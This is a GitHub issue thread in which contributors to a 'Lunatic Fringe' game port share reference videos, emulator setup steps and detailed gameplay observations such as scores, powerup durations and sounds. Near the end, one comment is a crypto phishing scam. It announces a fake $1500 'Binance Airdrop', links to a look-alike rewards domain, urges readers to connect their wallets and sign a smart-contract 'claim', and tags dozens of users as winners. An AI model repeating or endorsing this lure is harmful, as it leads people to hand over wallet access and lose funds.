### ISSUE TITLE
Reference videos for Gameplay?

### ISSUE THREAD

**Issue by clort81** [jackinloadup/lunatic-fringe#10]
I'd be interested in porting this.  Do we have any reference videos for the gameplay?

**Comment by pavellishin** [comment]
There's a few on YouTube.

**Comment by jackinloadup** [comment]
[Here is one](https://youtu.be/hvFMHo78pcs?t=141),  [2:21-3:50].


I'll reach out to the original person who captured the graphics and such. Maybe they have the videos or w/e. Best of luck!!!

I'm still open to contributions and anyone wanting to become a contributor can do so by requesting and having a valid PR to kick things off.

I've posted this issue in a fork. https://github.com/schwal10/lunatic-fringe/issues/23
Shout out to schwal10 for pushing things forward!

**Comment by clort81** [comment]
Thanks jackinloadup.  At my college there was one kid who was amazingly good at lunatic fringe.  and one night, at a party he started playing.  And he just didn't die.   

The next morning we went by his dorm room, and he was still playing the same game, with a small gaggle of onlookers giving him water and stuff.

It was unreal.  Curious about getting the mechanics right.

**Comment by jackinloadup** [comment]
Thanks for the story. When I played on the regular I was very young and was never very good.  I hope we can build a faithfully reproduce the game.

**Comment by schwal10** [comment]
@jackinloadup Did you ever get a response from the person who captured the graphics? I have also been looking for reference videos of the gameplay and the one you linked was the best one I could find.

**Comment by jackel1138** [comment]
New gameplay video here. I can do more if needed.

https://www.youtube.com/watch?v=zZglGbYGRtI

**Comment by JamesCarnley** [comment]
Hurrah! There is now a web-native version of Mac OS 8 accessible at https://macos8.app/ which has access to the original Lunatic Fringe files. This should be a good and reliable way to access game art, sound, and reference gameplay for physics and AI coding. There's currently a few steps to install it, the sound is heavily delayed, and at least I needed to hold caps lock down the entire time to keep the game running but those issues might be smoothed out in the future.

Steps to access After Dark->Lunatic Fringe on the web:

1. Go to https://macos8.app/
2. Double click Macintosh HD
3. Double click System Folder
4. Double click Control Panel. Keep this window visible as we will drag something here.
5. Go back to the desktop and double click Infinite HD
6. Double click Control Panel & Extensions
7. Double click After Dark
8. Drag the After Dark 2.0x file and After Dark Files folder into the Control Panel folder from step 4.
9. In the menu bar at the top of the screen select Special -> Restart.
10. Once you are back on the desktop you can open the Control Panel folder and double click After Dark 2.0x and it should run.

I suggest clicking the When button in the top right of After Dark and setting the sleep timer to 1 minute of inactivity. Also setting the keys to better modern day defaults is nice such as W-Thrust A-Left D-Right S-SuperThrust Space-Fire E-Shield Q-SelfDestruct. You can also full screen the emulator by clicking the little Apple icon on the monitor.

**Comment by jackel1138** [comment]
I mean, I can totally record more on the old mac I have if needed. Do ya'll need more references and if so, is there anything specific you need?

**Comment by schwal10** [comment]
@jackel1138 your last video had a ton of great information in it, thank you! I am not sure what other references would be needed (I am sure a bunch more footage could be useful for determining different health and damage values of bullets and collisions), but for what is it worth here is a list of some notes I made from your gameplay video, in case anybody wants it:

GENERAL
-There appears to be a whole image regarding the plot of Lunatic Fringe that we don't seem to have (or at least, I don't have) in the repo at this time. Probably obtainable on the internet somewhere.
-When the last enemy is destroyed for a level-up requirement, the enemy death sound is not played but instead the level up sound is played.
-There appears to be no bonus points awarded when you level up.

PLAYER
-The Condition lights at the top of the list of player ship information appear to have nothing to do with the ship systems, but are rather tied to the Base, Fuel, and Enemies. If a player is at their base, then regardless of what other indicators are on the blue indicator is active. The remaining lights match the color of the fuel bar (which is never blue) unless there is an enemy on the scanner (specifically scanner, not radar) in which case the red indicator is shown instead of whatever indicator matches the fuel color.
-Repairs from the player base start when you are getting pulled into the base, not when you have finally stopped at the base
-Low Fuel sounds happen only once (not three times in succession like is currently coded in this repo). This first happens when fuel hits yellow (50% remaining)
-When at the Player Base, the player seems to regen fuel and spare parts about 3 times per second, although the repair sound is only played once per second.
-Player spawns somewhere in space randomly after they die, they do not respawn at base (already coded in repo)
-Getting 3000 points appears to give the player another life
-The player can have all ship systems be red and still not bee dead (31:17 in video)
-While respawning/fading in the player is invulnerable and collisions will player the collision sound as if the player was invulnerable


ENEMIES
-Quadblaster is worth 50 points
-Hammerhead is worth 100 points
-Sludgermine is worth 2 points
-Sludger is worth 50 points
-Player appears to gain points from enemy death even if it is not from the player (enemy died offscreen, probably to asteroid). Death sound was still played
-Hammerhead Hammer lifetime once thrown is between 2-3 seconds. Around 8 seconds after the hammer is initially thrown another hammer is generated and takes 2-3 seconds to fade in.
-Enemy base appears to just fire its blue bullets at the player based on where the player was at the time of firing (so no logic to try and guess where it needs to fire to actually hit the player)
-Normal bullets kill a SludgerMine in 1 hit, a QuadBlaster in 2 hits, and a Sludger in 2 hits. Hammerhead died in roughtly 8-ish hits.
-Hammerhead Hammer hitting the player ship has a special sound effect that I do not think we have in the repo.
-Sludgermines don't stop bullets (pretty sure we already have this functionality but nice to have it confirmed)
-3 hits from an invulnerable player kills the Hammerhead, 1 hit from an invulerable player kills the Sludger
-Puffer appears to first show up at level 4, Slicer appears to first show up at level 7
-Sludgermine appears to have a lifetime and will die on its own after a time (no idea how long that is though), 28:28 example in video
-Enemies do not appear to collide with each other at all

POWERUPS
-Invulnerability powerup is actually called Power Shield
-Activating the Power Sheild sets all ship systems to blue and fuel to max and spare parts to full. You do not lose fuel while in this state. Everything reverts back to what it was after the powerup ends.
-Power Shield seems to last about 40 seconds
-TurboBoost seems to last about 1 second
-The Large Photon appears to one-shot kill the Quadblaster and Hammerhead enemies, and did not get destroyed when it did so. It also appears to one hit kill a Slicer.
-SpreadShot bullets have a a different sound effect when hitting enemies than the normal bullets (and I think also different from QuadBlaster bullets, although I don't fully remember)
-Large Photon also has a different sound effect when hitting enemies, which is hard to determine but at some point in the video an asteroid is hit with the large photon and the sound effect is obvious
-The player can have the spreadshot and large photon powerups active AT THE SAME TIME. It is like a normal spreadshot except the middle bullet becomes the large photon.
-Red plus powerup gives roughly half of fuel back
-When double points powerup is lost a sound is player, same sound used for game startup
-double point powerup appears to last around 35 seconds
-Large photon appears to "block" other projectiles (like puffer projectile, 20:00 in video)
-Large Photon powerup appears to not be timed, but rather lasts for 10 shots
-Spreadshot powerup appears to not be timed, but rather lasts for 30 shots
-When the invulnerability power wears off a message pops up that says "Vulnerable"
-Spare Parts powerup restores half of the player's spare parts
-Picking up a powerup appears to cause another powerup to spawn in the world (29:50 in video)

**Comment by jackel1138** [comment]
Wow! That's a great list of observations from one video.

If by "plot" you're referring to the short blurb in one of the splash screens of the pause menu, then I can certainly capture that, as well as the other splash screens. I have acquired a better Mac capable of running the game and capturing video. 

I'll do my best to make another video this weekend. My wife will be out of town and I'll have lots of spare time. I'll try to get the sound effects I missed, and clear up any gameplay that's still ambiguous.

**Comment by steven-sosebee** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://link.binancerewards.online/T4wOMA)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://link.binancerewards.online/T4wOMA) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @devstein, @yyyyyae, @AhmedNoaman602, @R-K-H, @elislusarczyk, @raunaqss, @bryanwills, @Candice1111, @rexkimj, @KlotzAndrew, @Kelimion, @everettjf, @initial, @excogitation, @huanghuang933, @melodynn03, @aliorouji, @tieubao, @huseyin39, @puongro2, @Makpara, @derekdylu, @albertchan404, @alexlevy0, @PaulinaParangerHr, @kartikb29, @yct21, @otgontsetseg26, @ppiccolo, @Letstaper, @no7dw, @Wo0dy, @trosel, @bgorlick, @smorimoto, @kurimi1, @nslam, @5up3rc, @ngn999, @Naoki2015, @siromivel, @whereissam, @zonito, @ljaderman, @chopwoodwater, @Barbatosso, @suryast, @iamminci, @wongoo, @VCoinU

**Comment by schwal10** [comment]
@jackel1138 I think there is another sound we are missing from the files. I was combing through https://www.youtube.com/watch?v=zZglGbYGRtI&t=928s again for sounds and I noticed that there is a unique sound that plays when the Large Photon hits something that it doesn't destroy (15:28). I went through the audio files I have and I do not appear to have this sound. Would you be able to get that sound effect?

**Comment by clort81** [comment]
I cannot call myself a fan of the sound design here. 

Does the original quantize ship orientation to 32 facings matching the ship graphics?
I'd really prefer 'infinite' degrees of rotation with just the sprite selected by DIV(5.625+orientation/32)
